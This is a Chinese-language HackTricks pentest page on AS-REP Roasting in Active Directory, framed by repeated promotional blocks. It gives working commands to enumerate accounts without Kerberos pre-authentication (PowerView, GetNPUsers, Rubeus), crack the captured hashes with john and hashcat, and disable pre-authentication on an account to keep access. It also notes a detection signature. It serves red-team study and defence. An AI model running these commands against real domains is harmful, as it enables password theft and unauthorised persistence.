hacktricks/windows-hardening/active-directory-methodology/asreproast.md

5.5 KiB
Raw Blame History

ASREPRoast

从零到英雄学习AWS黑客攻击 htARTE (HackTricks AWS Red Team Expert)

支持HackTricks的其他方式

加入HackenProof Discord服务器,与经验丰富的黑客和漏洞赏金猎人交流!

黑客洞察
深入探讨黑客攻击的刺激和挑战

实时黑客新闻
通过实时新闻和洞察,跟上快节奏的黑客世界

最新公告
通过最新的漏洞赏金发布和关键平台更新,保持信息的更新

加入我们的 Discord 并开始与顶尖黑客合作!

ASREPRoast

ASREPRoast攻击寻找没有启用Kerberos预认证要求属性的用户DONT_REQ_PREAUTH_

这意味着任何人都可以代表这些用户向DC发送AS_REQ请求并收到AS_REP消息。这最后一种消息包含了一块用原始用户密钥加密的数据该密钥来自其密码。然后使用这个消息用户密码可以离线破解。

此外,执行此攻击不需要域账户只需要连接到DC。然而有了域账户可以使用LDAP查询在域中检索没有启用Kerberos预认证的用户否则用户名必须猜测

枚举易受攻击的用户(需要域凭证)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

请求 AS_REP 消息

{% code title="使用 Linux" %}

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
{% endcode %}

{% code title="使用Windows" %}
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

{% endcode %}

{% hint style="warning" %} 使用 Rubeus 进行 AS-REP Roasting 会生成一个加密类型为 0x17 和预认证类型为 0 的 4768。 {% endhint %}

破解

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

持久性

在您拥有 GenericAll 权限(或有权写入属性)的用户上强制设置无需预认证

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

参考资料

关于 AS-REP Roasting 的更多信息请见 ired.team

加入 HackenProof Discord 服务器,与经验丰富的黑客和漏洞赏金猎人交流!

黑客洞察
深入了解黑客的刺激和挑战

实时黑客新闻
通过实时新闻和洞察了解快节奏的黑客世界

最新公告
通过最新的漏洞赏金发布和关键平台更新保持信息更新

加入我们的 Discord 开始与顶尖黑客合作!

从零开始学习 AWS 黑客技术,成为 htARTE (HackTricks AWS Red Team Expert)

支持 HackTricks 的其他方式: